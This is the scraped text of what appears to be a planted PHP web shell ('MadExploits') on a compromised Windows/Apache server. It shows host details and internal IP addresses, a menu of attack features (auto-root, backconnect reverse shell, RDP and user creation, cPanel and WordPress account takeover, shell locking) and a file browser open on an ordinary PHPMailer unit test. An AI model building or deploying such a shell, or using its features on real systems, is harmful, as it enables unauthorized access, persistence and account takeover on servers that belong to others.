Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
etc /
php /
pear /
PHPMailer /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
bootstrap.php
140
B
-rw-rw-rw-
fakepopserver.sh
2.93
KB
-rw-rw-rw-
fakesendmail.sh
474
B
-rw-rw-rw-
phpmailerLangTest.php
2.29
KB
-rw-rw-rw-
phpmailerTest.php
76.7
KB
-rw-rw-rw-
runfakepopserver.sh
359
B
-rw-rw-rw-
test_callback.php
2.62
KB
-rw-rw-rw-
testbootstrap-dist.php
238
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpmailerLangTest.php
<?php /** * PHPMailer - language file tests * Requires PHPUnit 3.3 or later. * * PHP version 5.0.0 * * @package PHPMailer * @author Andy Prevost * @author Marcus Bointon <phpmailer@synchromedia.co.uk> * @copyright 2004 - 2009 Andy Prevost * @copyright 2010 Marcus Bointon * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License */ require_once '../PHPMailerAutoload.php'; /** * PHPMailer - PHP email transport unit test class * Performs authentication tests */ class PHPMailerLangTest extends PHPUnit_Framework_TestCase { /** * Holds a phpmailer instance. * @private * @var PHPMailer */ public $Mail; /** * @var string Default include path */ public $INCLUDE_DIR = '../'; /** * Run before each test is started. */ public function setUp() { $this->Mail = new PHPMailer; } /** * Test language files for missing and excess translations * All languages are compared with English * @group languages */ public function testTranslations() { $this->Mail->setLanguage('en'); $definedStrings = $this->Mail->getTranslations(); $err = ''; foreach (new DirectoryIterator('../language') as $fileInfo) { if ($fileInfo->isDot()) { continue; } $matches = array(); //Only look at language files, ignore anything else in there if (preg_match('/^phpmailer\.lang-([a-z_]{2,})\.php$/', $fileInfo->getFilename(), $matches)) { $lang = $matches[1]; //Extract language code $PHPMAILER_LANG = array(); //Language strings get put in here include $fileInfo->getPathname(); //Get language strings $missing = array_diff(array_keys($definedStrings), array_keys($PHPMAILER_LANG)); $extra = array_diff(array_keys($PHPMAILER_LANG), array_keys($definedStrings)); if (!empty($missing)) { $err .= "\nMissing translations in $lang: " . implode(', ', $missing); } if (!empty($extra)) { $err .= "\nExtra translations in $lang: " . implode(', ', $extra); } } } $this->assertEmpty($err, $err); } }
Close